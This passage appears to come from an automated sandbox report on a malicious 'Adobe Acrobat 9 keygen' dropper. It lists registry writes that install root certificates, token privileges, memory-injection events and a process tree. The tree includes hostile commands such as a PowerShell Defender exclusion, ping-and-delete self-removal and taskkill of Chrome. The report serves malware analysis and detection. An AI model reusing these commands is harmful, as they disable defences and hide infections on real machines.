description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs .reg file with regedit 2 IoCs
pid Process 8668 regedit.exe 7176 regedit.exe -
Runs ping.exe 1 TTPs 5 IoCs
pid Process 6988 PING.EXE 3968 PING.EXE 3696 PING.EXE 4352 PING.EXE 4780 PING.EXE -
Script User-Agent 43 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 642 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1684 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1693 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1051 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1641 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1678 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1685 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1867 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1993 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2183 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 356 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1389 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1465 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1653 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 200 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1374 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1825 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2042 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1222 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1481 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2064 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2077 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 440 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 660 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 772 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 912 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1857 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 107 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 444 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1182 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1304 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2239 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 526 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1000 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1217 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1302 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1939 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1984 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 103 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 337 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 768 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1174 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4184 1615299604156.exe 4184 1615299604156.exe 5004 1615299608500.exe 5004 1615299608500.exe 3776 1615299613562.exe 3776 1615299613562.exe 4880 file.exe 4880 file.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4356 multitimer.exe 4880 file.exe 4880 file.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3416 msiexec.exe Token: SeIncreaseQuotaPrivilege 3416 msiexec.exe Token: SeSecurityPrivilege 904 msiexec.exe Token: SeCreateTokenPrivilege 3416 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3416 msiexec.exe Token: SeLockMemoryPrivilege 3416 msiexec.exe Token: SeIncreaseQuotaPrivilege 3416 msiexec.exe Token: SeMachineAccountPrivilege 3416 msiexec.exe Token: SeTcbPrivilege 3416 msiexec.exe Token: SeSecurityPrivilege 3416 msiexec.exe Token: SeTakeOwnershipPrivilege 3416 msiexec.exe Token: SeLoadDriverPrivilege 3416 msiexec.exe Token: SeSystemProfilePrivilege 3416 msiexec.exe Token: SeSystemtimePrivilege 3416 msiexec.exe Token: SeProfSingleProcessPrivilege 3416 msiexec.exe Token: SeIncBasePriorityPrivilege 3416 msiexec.exe Token: SeCreatePagefilePrivilege 3416 msiexec.exe Token: SeCreatePermanentPrivilege 3416 msiexec.exe Token: SeBackupPrivilege 3416 msiexec.exe Token: SeRestorePrivilege 3416 msiexec.exe Token: SeShutdownPrivilege 3416 msiexec.exe Token: SeDebugPrivilege 3416 msiexec.exe Token: SeAuditPrivilege 3416 msiexec.exe Token: SeSystemEnvironmentPrivilege 3416 msiexec.exe Token: SeChangeNotifyPrivilege 3416 msiexec.exe Token: SeRemoteShutdownPrivilege 3416 msiexec.exe Token: SeUndockPrivilege 3416 msiexec.exe Token: SeSyncAgentPrivilege 3416 msiexec.exe Token: SeEnableDelegationPrivilege 3416 msiexec.exe Token: SeManageVolumePrivilege 3416 msiexec.exe Token: SeImpersonatePrivilege 3416 msiexec.exe Token: SeCreateGlobalPrivilege 3416 msiexec.exe Token: SeCreateTokenPrivilege 3416 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3416 msiexec.exe Token: SeLockMemoryPrivilege 3416 msiexec.exe Token: SeIncreaseQuotaPrivilege 3416 msiexec.exe Token: SeMachineAccountPrivilege 3416 msiexec.exe Token: SeTcbPrivilege 3416 msiexec.exe Token: SeSecurityPrivilege 3416 msiexec.exe Token: SeTakeOwnershipPrivilege 3416 msiexec.exe Token: SeLoadDriverPrivilege 3416 msiexec.exe Token: SeSystemProfilePrivilege 3416 msiexec.exe Token: SeSystemtimePrivilege 3416 msiexec.exe Token: SeProfSingleProcessPrivilege 3416 msiexec.exe Token: SeIncBasePriorityPrivilege 3416 msiexec.exe Token: SeCreatePagefilePrivilege 3416 msiexec.exe Token: SeCreatePermanentPrivilege 3416 msiexec.exe Token: SeBackupPrivilege 3416 msiexec.exe Token: SeRestorePrivilege 3416 msiexec.exe Token: SeShutdownPrivilege 3416 msiexec.exe Token: SeDebugPrivilege 3416 msiexec.exe Token: SeAuditPrivilege 3416 msiexec.exe Token: SeSystemEnvironmentPrivilege 3416 msiexec.exe Token: SeChangeNotifyPrivilege 3416 msiexec.exe Token: SeRemoteShutdownPrivilege 3416 msiexec.exe Token: SeUndockPrivilege 3416 msiexec.exe Token: SeSyncAgentPrivilege 3416 msiexec.exe Token: SeEnableDelegationPrivilege 3416 msiexec.exe Token: SeManageVolumePrivilege 3416 msiexec.exe Token: SeImpersonatePrivilege 3416 msiexec.exe Token: SeCreateGlobalPrivilege 3416 msiexec.exe Token: SeCreateTokenPrivilege 3416 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 3416 msiexec.exe Token: SeLockMemoryPrivilege 3416 msiexec.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 3416 msiexec.exe 4464 Setup3310.tmp 4432 chashepro3.tmp 4616 v0utu55kp5k.tmp 4936 IBInstaller_97039.tmp 4688 vict.tmp 4948 vpn.tmp -
Suspicious use of SetWindowsHookEx 29 IoCs
pid Process 2176 Setup.exe 208 AD754B4D3FE2C4EE.exe 2268 AD754B4D3FE2C4EE.exe 3660 firefox.exe 4184 1615299604156.exe 4988 firefox.exe 5004 1615299608500.exe 3772 firefox.exe 3776 1615299613562.exe 4488 v0utu55kp5k.exe 4528 vict.exe 4540 s1kajgjgass.exe 4616 v0utu55kp5k.tmp 4688 vict.tmp 4740 IBInstaller_97039.exe 4724 s1kajgjgass.tmp 4716 askinstall24.exe 4708 Setup3310.exe 4700 chashepro3.exe 4156 vpn.exe 4464 Setup3310.tmp 4432 chashepro3.tmp 4936 IBInstaller_97039.tmp 4948 vpn.tmp 5072 Brava.exe 2348 winlthst.exe 3772 app.exe 4548 chrome_proxy.exe 2912 wimapi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1144 wrote to memory of 1104 1144 Adobe_Acrobat_9_keygen_by_KeygenNinja.exe 79 PID 1144 wrote to memory of 1104 1144 Adobe_Acrobat_9_keygen_by_KeygenNinja.exe 79 PID 1144 wrote to memory of 1104 1144 Adobe_Acrobat_9_keygen_by_KeygenNinja.exe 79 PID 1104 wrote to memory of 1456 1104 cmd.exe 82 PID 1104 wrote to memory of 1456 1104 cmd.exe 82 PID 1104 wrote to memory of 1456 1104 cmd.exe 82 PID 1104 wrote to memory of 3408 1104 cmd.exe 83 PID 1104 wrote to memory of 3408 1104 cmd.exe 83 PID 1104 wrote to memory of 3408 1104 cmd.exe 83 PID 1104 wrote to memory of 1120 1104 cmd.exe 84 PID 1104 wrote to memory of 1120 1104 cmd.exe 84 PID 1104 wrote to memory of 1120 1104 cmd.exe 84 PID 1104 wrote to memory of 1016 1104 cmd.exe 85 PID 1104 wrote to memory of 1016 1104 cmd.exe 85 PID 1104 wrote to memory of 1016 1104 cmd.exe 85 PID 1456 wrote to memory of 3764 1456 keygen-pr.exe 86 PID 1456 wrote to memory of 3764 1456 keygen-pr.exe 86 PID 1456 wrote to memory of 3764 1456 keygen-pr.exe 86 PID 1016 wrote to memory of 2176 1016 keygen-step-4.exe 87 PID 1016 wrote to memory of 2176 1016 keygen-step-4.exe 87 PID 1016 wrote to memory of 2176 1016 keygen-step-4.exe 87 PID 1120 wrote to memory of 2312 1120 keygen-step-3.exe 88 PID 1120 wrote to memory of 2312 1120 keygen-step-3.exe 88 PID 1120 wrote to memory of 2312 1120 keygen-step-3.exe 88 PID 3764 wrote to memory of 2112 3764 key.exe 90 PID 3764 wrote to memory of 2112 3764 key.exe 90 PID 3764 wrote to memory of 2112 3764 key.exe 90 PID 2312 wrote to memory of 3968 2312 cmd.exe 91 PID 2312 wrote to memory of 3968 2312 cmd.exe 91 PID 2312 wrote to memory of 3968 2312 cmd.exe 91 PID 2176 wrote to memory of 3416 2176 Setup.exe 92 PID 2176 wrote to memory of 3416 2176 Setup.exe 92 PID 2176 wrote to memory of 3416 2176 Setup.exe 92 PID 904 wrote to memory of 2780 904 msiexec.exe 94 PID 904 wrote to memory of 2780 904 msiexec.exe 94 PID 904 wrote to memory of 2780 904 msiexec.exe 94 PID 2176 wrote to memory of 208 2176 Setup.exe 95 PID 2176 wrote to memory of 208 2176 Setup.exe 95 PID 2176 wrote to memory of 208 2176 Setup.exe 95 PID 2176 wrote to memory of 2268 2176 Setup.exe 96 PID 2176 wrote to memory of 2268 2176 Setup.exe 96 PID 2176 wrote to memory of 2268 2176 Setup.exe 96 PID 2176 wrote to memory of 2968 2176 Setup.exe 97 PID 2176 wrote to memory of 2968 2176 Setup.exe 97 PID 2176 wrote to memory of 2968 2176 Setup.exe 97 PID 1016 wrote to memory of 788 1016 keygen-step-4.exe 98 PID 1016 wrote to memory of 788 1016 keygen-step-4.exe 98 PID 1016 wrote to memory of 788 1016 keygen-step-4.exe 98 PID 2968 wrote to memory of 3696 2968 cmd.exe 100 PID 2968 wrote to memory of 3696 2968 cmd.exe 100 PID 2968 wrote to memory of 3696 2968 cmd.exe 100 PID 788 wrote to memory of 1496 788 askinstall20.exe 101 PID 788 wrote to memory of 1496 788 askinstall20.exe 101 PID 788 wrote to memory of 1496 788 askinstall20.exe 101 PID 1496 wrote to memory of 3100 1496 cmd.exe 103 PID 1496 wrote to memory of 3100 1496 cmd.exe 103 PID 1496 wrote to memory of 3100 1496 cmd.exe 103 PID 2268 wrote to memory of 1760 2268 AD754B4D3FE2C4EE.exe 104 PID 2268 wrote to memory of 1760 2268 AD754B4D3FE2C4EE.exe 104 PID 2268 wrote to memory of 1760 2268 AD754B4D3FE2C4EE.exe 104 PID 208 wrote to memory of 3660 208 AD754B4D3FE2C4EE.exe 105 PID 208 wrote to memory of 3660 208 AD754B4D3FE2C4EE.exe 105 PID 208 wrote to memory of 3660 208 AD754B4D3FE2C4EE.exe 105 PID 208 wrote to memory of 3660 208 AD754B4D3FE2C4EE.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\Adobe_Acrobat_9_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Adobe_Acrobat_9_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2112
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3408
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3416
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:3660
-
-
C:\Users\Admin\AppData\Roaming\1615299604156.exe"C:\Users\Admin\AppData\Roaming\1615299604156.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299604156.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4184
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4988
-
-
C:\Users\Admin\AppData\Roaming\1615299608500.exe"C:\Users\Admin\AppData\Roaming\1615299608500.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299608500.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:3772 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Nameless-Grass"7⤵PID:4848
-
-
-
C:\Users\Admin\AppData\Roaming\1615299613562.exe"C:\Users\Admin\AppData\Roaming\1615299613562.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299613562.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3776
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"6⤵PID:5720
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP6⤵PID:3464
-
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1760
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4140
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"6⤵PID:4280
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 37⤵
- Runs ping.exe
PID:4352
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
PID:3696
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:788 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:3100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"4⤵
- Executes dropped EXE
PID:4228 -
C:\Users\Admin\AppData\Local\Temp\0GOWAYNTBE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0GOWAYNTBE\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4388 -
C:\Users\Admin\AppData\Local\Temp\0GOWAYNTBE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0GOWAYNTBE\multitimer.exe" 1 3.1615299827.604784f3ed9c5 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5056 -
C:\Users\Admin\AppData\Local\Temp\0GOWAYNTBE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0GOWAYNTBE\multitimer.exe" 2 3.1615299827.604784f3ed9c57⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4356 -
C:\Users\Admin\AppData\Local\Temp\jlysx3erxsz\wbzaw1eymgj.exe"C:\Users\Admin\AppData\Local\Temp\jlysx3erxsz\wbzaw1eymgj.exe" testparams8⤵
- Executes dropped EXE
PID:4232 -
